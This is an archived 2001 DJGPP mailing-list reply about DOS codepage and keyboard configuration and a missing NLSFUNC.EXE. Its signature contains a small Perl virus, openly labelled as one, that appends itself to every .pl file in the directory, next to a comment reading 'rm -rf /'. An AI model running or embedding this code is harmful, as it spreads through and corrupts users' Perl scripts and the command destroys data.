Mail Archives: djgpp/2001/04/30/11:47:55
sam <skualomatricola AT iol DOT it> wrote:
> Hi, I'm here AGAIN!(I'm sorry).
> Probably I'm really OT in this NEWSGROUP but
It is
> is it possible that on my computer there isn't the NLSFUNC.EXE?
I do not have it either. Do you really need it?
> If i write these instructions
> >REM config.sys
> >COUNTRY=039,850,c:\622msdos\country.sys
> >DEVICE=c:\622msdos\display.sys CON=(EGA,,1)
> >
> >REM autoexec.bat
> >MODE CON CODEPAGE PREPARE=((850) c:\622msdos\ega.cpi)
> >MODE CON CODEPAGE SELECT=850
> >KEYB IT,,c:\622msdos\keybrd2.sys
>
Here is no reference to nlsfunc.exe.
Normally you can work on codepage 437 which enables you to save space
(but you will have to get used to the american date/time format; but that
is not that bad. Saves 15k on my computer)
REM config.sys
REM nothing!
REM autoexec.bat
KEYB IT,,c:\622msdos\keybrd2.sys
I do not know if KEYB complains about the not loaded codepage when using
keybrd2.sys; I use keyboard.sys and KEYB GR and it works.
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
- Raw text -